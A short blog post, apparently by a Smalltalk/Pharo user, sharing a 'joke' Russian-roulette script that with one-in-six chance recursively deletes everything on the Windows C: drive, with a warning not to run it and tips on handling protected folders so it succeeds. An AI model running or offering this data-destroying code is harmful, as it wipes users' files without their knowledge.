It is saturday and all I can think of is a joke script :) Of course do not run this on your (Windows) production server.
1 2 3 | ((Random new nextInt: SmallInteger maxVal) \\ 6 ) isZero ifTrue: [ (FileSystem root / 'C:' ) ensureDeleteAll ] ifFalse: [ 'You live' ]. |
If it just happen you ever try the script, you will have to add some exception handlers due to hidden or protected folders like "C:\Documents and Settings\All Users\Application Data" (or you just can enhance the FilePlugin primitives).
0 comentarios:
Publicar un comentario